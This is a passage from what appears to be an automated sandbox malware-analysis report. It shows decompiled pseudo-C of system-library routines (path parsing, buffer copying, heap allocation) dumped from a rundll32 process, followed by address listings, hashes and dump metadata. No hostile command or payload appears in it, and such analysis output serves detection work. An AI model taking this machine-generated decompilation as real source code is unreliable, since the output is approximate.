														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0461F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0461F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E046A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0462D130(_t427, _t494, _t511);
				}
			}










































































                                                                                            0x046a5ba5
                                                                                            0x046a5baa
                                                                                            0x046a5baf
                                                                                            0x046a5bb4
                                                                                            0x046a5bb6
                                                                                            0x046a5bbc
                                                                                            0x046a5bbe
                                                                                            0x046a5bc4
                                                                                            0x046a5bcd
                                                                                            0x046a5bd3
                                                                                            0x046a5bd6
                                                                                            0x046a5bdc
                                                                                            0x046a5be0
                                                                                            0x046a5be3
                                                                                            0x046a5beb
                                                                                            0x046a5bf2
                                                                                            0x046a5bf8
                                                                                            0x046a5bfe
                                                                                            0x046a5c04
                                                                                            0x046a5c0e
                                                                                            0x046a5c18
                                                                                            0x046a5c1f
                                                                                            0x046a5c25
                                                                                            0x046a5c2a
                                                                                            0x046a5c2c
                                                                                            0x046a5c32
                                                                                            0x046a5c3a
                                                                                            0x046a5c3f
                                                                                            0x046a5c42
                                                                                            0x046a5c48
                                                                                            0x046a5c5b
                                                                                            0x046a5c5b
                                                                                            0x046a5c2c
                                                                                            0x046a5cb7
                                                                                            0x046a5cb9
                                                                                            0x046a5cbf
                                                                                            0x046a5cc2
                                                                                            0x046a5cca
                                                                                            0x046a5ccb
                                                                                            0x046a5ccb
                                                                                            0x046a5cd1
                                                                                            0x046a5cd7
                                                                                            0x046a5cda
                                                                                            0x046a5ce1
                                                                                            0x046a5ce4
                                                                                            0x046a5ce7
                                                                                            0x046a5ced
                                                                                            0x046a5cf3
                                                                                            0x046a5cf9
                                                                                            0x046a5cff
                                                                                            0x046a5d08
                                                                                            0x046a5d0a
                                                                                            0x046a5d0e
                                                                                            0x046a5d10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d16
                                                                                            0x046a5d1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d20
                                                                                            0x046a5d22
                                                                                            0x046a5d25
                                                                                            0x046a5d2f
                                                                                            0x046a5d2f
                                                                                            0x046a5d33
                                                                                            0x046a5d3d
                                                                                            0x046a5d49
                                                                                            0x046a5d4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d5a
                                                                                            0x046a5d5d
                                                                                            0x046a5d60
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d66
                                                                                            0x046a5d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d6f
                                                                                            0x046a5d6f
                                                                                            0x046a5d73
                                                                                            0x046a5d79
                                                                                            0x046a5d7f
                                                                                            0x046a5d86
                                                                                            0x046a5d95
                                                                                            0x046a5d98
                                                                                            0x046a5dba
                                                                                            0x046a5dcb
                                                                                            0x046a5dce
                                                                                            0x046a5dd3
                                                                                            0x046a5dd6
                                                                                            0x046a5dd8
                                                                                            0x046a5de6
                                                                                            0x046a5dec
                                                                                            0x046a5dee
                                                                                            0x046a5df1
                                                                                            0x046a5df3
                                                                                            0x046a635a
                                                                                            0x046a635a
                                                                                            0x00000000
                                                                                            0x046a635a
                                                                                            0x046a5dfe
                                                                                            0x046a5e02
                                                                                            0x046a5e05
                                                                                            0x046a5e07
                                                                                            0x046a5e10
                                                                                            0x046a5e13
                                                                                            0x046a5e1b
                                                                                            0x046a5e1c
                                                                                            0x046a5e21
                                                                                            0x046a5e22
                                                                                            0x046a5e23
                                                                                            0x046a5e25
                                                                                            0x046a5e2a
                                                                                            0x046a5e2c
                                                                                            0x046a5e2e
                                                                                            0x046a5e36
                                                                                            0x046a5e39
                                                                                            0x046a5e42
                                                                                            0x046a5e47
                                                                                            0x046a5e4d
                                                                                            0x046a5e54
                                                                                            0x046a5e54
                                                                                            0x046a5e54
                                                                                            0x046a5e2e
                                                                                            0x046a5e5c
                                                                                            0x046a5e5f
                                                                                            0x046a5e62
                                                                                            0x046a5e64
                                                                                            0x046a5e6b
                                                                                            0x046a5e70
                                                                                            0x046a5e7a
                                                                                            0x046a5e7a
                                                                                            0x046a5e7a
                                                                                            0x046a5e6b
                                                                                            0x046a5e7e
                                                                                            0x046a5e7f
                                                                                            0x046a5e7f
                                                                                            0x046a5e81
                                                                                            0x046a5e87
                                                                                            0x046a5e8b
                                                                                            0x046a5e8c
                                                                                            0x046a5e8c
                                                                                            0x046a5e8c
                                                                                            0x046a5e9a
                                                                                            0x046a5e9c
                                                                                            0x046a5ea2
                                                                                            0x046a5ea6
                                                                                            0x046a5f50
                                                                                            0x046a5f50
                                                                                            0x046a5f57
                                                                                            0x046a5f66
                                                                                            0x046a5f66
                                                                                            0x046a5f66
                                                                                            0x046a5f68
                                                                                            0x046a5f6a
                                                                                            0x046a63d0
                                                                                            0x00000000
                                                                                            0x046a5f70
                                                                                            0x046a5f70
                                                                                            0x046a5f91
                                                                                            0x046a5f9c
                                                                                            0x046a5f9e
                                                                                            0x046a5fa4
                                                                                            0x046a5fa6
                                                                                            0x046a638c
                                                                                            0x046a6392
                                                                                            0x046a63a1
                                                                                            0x046a63a7
                                                                                            0x046a63af
                                                                                            0x046a63af
                                                                                            0x046a63bd
                                                                                            0x046a63d8
                                                                                            0x00000000
                                                                                            0x046a63d8
                                                                                            0x046a5fac
                                                                                            0x046a5fb2
                                                                                            0x046a5fb4
                                                                                            0x046a5fbd
                                                                                            0x046a5fc6
                                                                                            0x046a5fce
                                                                                            0x046a5fd4
                                                                                            0x046a5fdc
                                                                                            0x046a5fec
                                                                                            0x046a5fed
                                                                                            0x046a5fee
                                                                                            0x046a5fef
                                                                                            0x046a5ff9
                                                                                            0x046a5ffa
                                                                                            0x046a5ffb
                                                                                            0x046a5ffc
                                                                                            0x046a6000
                                                                                            0x046a6004
                                                                                            0x046a6012
                                                                                            0x046a6012
                                                                                            0x046a6018
                                                                                            0x046a6019
                                                                                            0x046a601a
                                                                                            0x046a601b
                                                                                            0x046a601c
                                                                                            0x046a6020
                                                                                            0x046a6059
                                                                                            0x046a605c
                                                                                            0x046a6061
                                                                                            0x046a6061
                                                                                            0x046a6022
                                                                                            0x046a6022
                                                                                            0x046a6022
                                                                                            0x046a6025
                                                                                            0x046a602a
                                                                                            0x046a602b
                                                                                            0x046a6031
                                                                                            0x046a6037
                                                                                            0x046a6038
                                                                                            0x046a603e
                                                                                            0x046a6048
                                                                                            0x046a6049
                                                                                            0x046a604a
                                                                                            0x046a604b
                                                                                            0x046a604c
                                                                                            0x046a604d
                                                                                            0x046a6053
                                                                                            0x046a6054
                                                                                            0x046a6054
                                                                                            0x046a6062
                                                                                            0x046a6065
                                                                                            0x046a6067
                                                                                            0x046a606a
                                                                                            0x046a6070
                                                                                            0x046a6075
                                                                                            0x046a6076
                                                                                            0x046a6081
                                                                                            0x046a6087
                                                                                            0x046a6095
                                                                                            0x046a6099
                                                                                            0x046a609e
                                                                                            0x046a60a4
                                                                                            0x046a60ae
                                                                                            0x046a60b0
                                                                                            0x046a60b3
                                                                                            0x046a60b6
                                                                                            0x046a60b8
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60be
                                                                                            0x046a60c0
                                                                                            0x046a60c5
                                                                                            0x046a60c5
                                                                                            0x046a60c5
                                                                                            0x046a60c6
                                                                                            0x046a60cd
                                                                                            0x046a6114
                                                                                            0x046a60cf
                                                                                            0x046a60cf
                                                                                            0x046a60d4
                                                                                            0x046a60d5
                                                                                            0x046a60da
                                                                                            0x046a60db
                                                                                            0x046a60e1
                                                                                            0x046a60e2
                                                                                            0x046a60e8
                                                                                            0x046a60f8
                                                                                            0x046a60fd
                                                                                            0x046a60fe
                                                                                            0x046a6102
                                                                                            0x046a6104
                                                                                            0x046a6107
                                                                                            0x046a6109
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610f
                                                                                            0x046a610f
                                                                                            0x046a6117
                                                                                            0x046a611a
                                                                                            0x046a611f
                                                                                            0x046a6125
                                                                                            0x046a6134
                                                                                            0x046a6139
                                                                                            0x046a613f
                                                                                            0x046a6146
                                                                                            0x046a6148
                                                                                            0x046a614b
                                                                                            0x046a614d
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a6153
                                                                                            0x046a6159
                                                                                            0x046a6159
                                                                                            0x046a615c
                                                                                            0x046a6163
                                                                                            0x046a6169
                                                                                            0x046a616c
                                                                                            0x046a6172
                                                                                            0x046a6181
                                                                                            0x046a6186
                                                                                            0x046a6187
                                                                                            0x046a618b
                                                                                            0x046a6191
                                                                                            0x046a6195
                                                                                            0x046a61a3
                                                                                            0x046a61bb
                                                                                            0x046a61c0
                                                                                            0x046a61c3
                                                                                            0x046a61cc
                                                                                            0x046a61d0
                                                                                            0x046a61dc
                                                                                            0x046a61de
                                                                                            0x046a61e1
                                                                                            0x046a61e4
                                                                                            0x046a61e6
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e6
                                                                                            0x046a61ec
                                                                                            0x046a61f3
                                                                                            0x046a6203
                                                                                            0x046a6209
                                                                                            0x046a620a
                                                                                            0x046a6216
                                                                                            0x046a621d
                                                                                            0x046a6227
                                                                                            0x046a6241
                                                                                            0x046a6246
                                                                                            0x046a624c
                                                                                            0x046a6257
                                                                                            0x046a6259
                                                                                            0x046a625c
                                                                                            0x046a625e
                                                                                            0x046a6260
                                                                                            0x046a6260
                                                                                            0x046a6260
                                                                                            0x046a6260
                                                                                            0x046a625e
                                                                                            0x046a6264
                                                                                            0x046a6267
                                                                                            0x046a6269
                                                                                            0x046a6315
                                                                                            0x046a6315
                                                                                            0x046a631b
                                                                                            0x046a631e
                                                                                            0x046a6324
                                                                                            0x046a6327
                                                                                            0x046a632f
                                                                                            0x046a6330
                                                                                            0x046a6333
                                                                                            0x046a633a
                                                                                            0x046a633c
                                                                                            0x046a6335
                                                                                            0x046a6335
                                                                                            0x046a6335
                                                                                            0x046a633f
                                                                                            0x046a6342
                                                                                            0x046a634c
                                                                                            0x046a6352
                                                                                            0x046a6355
                                                                                            0x046a6355
                                                                                            0x046a6359
                                                                                            0x00000000
                                                                                            0x046a626f
                                                                                            0x046a6275
                                                                                            0x046a6275
                                                                                            0x046a6278
                                                                                            0x046a627e
                                                                                            0x046a627e
                                                                                            0x046a6281
                                                                                            0x046a6287
                                                                                            0x046a628d
                                                                                            0x046a6298
                                                                                            0x046a629c
                                                                                            0x046a62a2
                                                                                            0x046a629e
                                                                                            0x046a629e
                                                                                            0x046a629e
                                                                                            0x046a62a7
                                                                                            0x046a62a7
                                                                                            0x046a62aa
                                                                                            0x046a62b0
                                                                                            0x046a62f0
                                                                                            0x046a62f0
                                                                                            0x046a62f2
                                                                                            0x046a62f8
                                                                                            0x046a62fd
                                                                                            0x046a62b2
                                                                                            0x046a62b2
                                                                                            0x046a62b2
                                                                                            0x046a62b5
                                                                                            0x046a62dd
                                                                                            0x046a62e2
                                                                                            0x046a62e5
                                                                                            0x046a62b7
                                                                                            0x046a62b8
                                                                                            0x046a62bb
                                                                                            0x046a62bd
                                                                                            0x046a62c0
                                                                                            0x046a62c4
                                                                                            0x046a62cd
                                                                                            0x046a62cd
                                                                                            0x046a62c0
                                                                                            0x046a62bb
                                                                                            0x046a62b5
                                                                                            0x046a6302
                                                                                            0x046a6303
                                                                                            0x046a6305
                                                                                            0x046a6305
                                                                                            0x046a6305
                                                                                            0x046a630c
                                                                                            0x046a630c
                                                                                            0x00000000
                                                                                            0x046a627e
                                                                                            0x046a6269
                                                                                            0x046a5eac
                                                                                            0x046a5ebb
                                                                                            0x046a5ebe
                                                                                            0x046a5ecb
                                                                                            0x046a5ecb
                                                                                            0x046a5ece
                                                                                            0x046a5ece
                                                                                            0x046a5ed4
                                                                                            0x046a5ed7
                                                                                            0x046a5ed9
                                                                                            0x046a5edb
                                                                                            0x046a5edb
                                                                                            0x046a5ee1
                                                                                            0x046a5ee1
                                                                                            0x046a5ee3
                                                                                            0x046a5f20
                                                                                            0x046a5f20
                                                                                            0x046a5ee5
                                                                                            0x046a5ee5
                                                                                            0x046a5ee5
                                                                                            0x046a5ee8
                                                                                            0x046a5f11
                                                                                            0x046a5f18
                                                                                            0x046a5eea
                                                                                            0x046a5eea
                                                                                            0x046a5eed
                                                                                            0x046a5ef2
                                                                                            0x046a5ef8
                                                                                            0x046a5efb
                                                                                            0x046a5f0a
                                                                                            0x046a5f0a
                                                                                            0x046a5eed
                                                                                            0x046a5ee8
                                                                                            0x046a5f22
                                                                                            0x046a5f28
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5f30
                                                                                            0x046a5f31
                                                                                            0x046a5f37
                                                                                            0x046a5f3a
                                                                                            0x046a5f3d
                                                                                            0x046a5f44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5f46
                                                                                            0x046a5f48
                                                                                            0x046a5f4d
                                                                                            0x00000000
                                                                                            0x046a5f4d
                                                                                            0x046a5dda
                                                                                            0x046a5ddf
                                                                                            0x00000000
                                                                                            0x046a5ddf
                                                                                            0x046a5dd8
                                                                                            0x046a5da7
                                                                                            0x046a5da9
                                                                                            0x046a5dac
                                                                                            0x046a5dae
                                                                                            0x00000000
                                                                                            0x046a5db4
                                                                                            0x046a5db4
                                                                                            0x00000000
                                                                                            0x046a5db4
                                                                                            0x046a5dae
                                                                                            0x046a5d88
                                                                                            0x046a5d8d
                                                                                            0x046a6363
                                                                                            0x046a6369
                                                                                            0x046a636a
                                                                                            0x046a6370
                                                                                            0x046a6372
                                                                                            0x046a637a
                                                                                            0x046a637b
                                                                                            0x046a637d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a637f
                                                                                            0x046a6385
                                                                                            0x00000000
                                                                                            0x046a6385
                                                                                            0x046a5d38
                                                                                            0x046a5d3b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d3b
                                                                                            0x046a5d27
                                                                                            0x046a5d29
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a6360
                                                                                            0x00000000
                                                                                            0x046a6360
                                                                                            0x046a5c10
                                                                                            0x046a5c10
                                                                                            0x046a63da
                                                                                            0x046a63e5
                                                                                            0x046a63e5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 351baa6ed5ed748551ed496c27020806401b04c1f0ab8a21bf611d1c56d05801
                                                                                            • Instruction ID: 5071a8a59f3b8661c6d7ea05b315870c12bd6e0a4318636d3febee0ee96c6d4e
                                                                                            • Opcode Fuzzy Hash: 351baa6ed5ed748551ed496c27020806401b04c1f0ab8a21bf611d1c56d05801
                                                                                            • Instruction Fuzzy Hash: E6425D75A00629DFDB24CF68C880BA9B7B1FF55304F1481AAD84DAB342E734AD95CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045F4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E045F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x46cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0460F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E045F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L045F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E045F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M045F45F8))) {
												case 0:
													_v568 = 0x45b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x45b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L045F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0461F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0461F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E045D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E045EEB70(1, 0x46c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E045EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E046195D0();
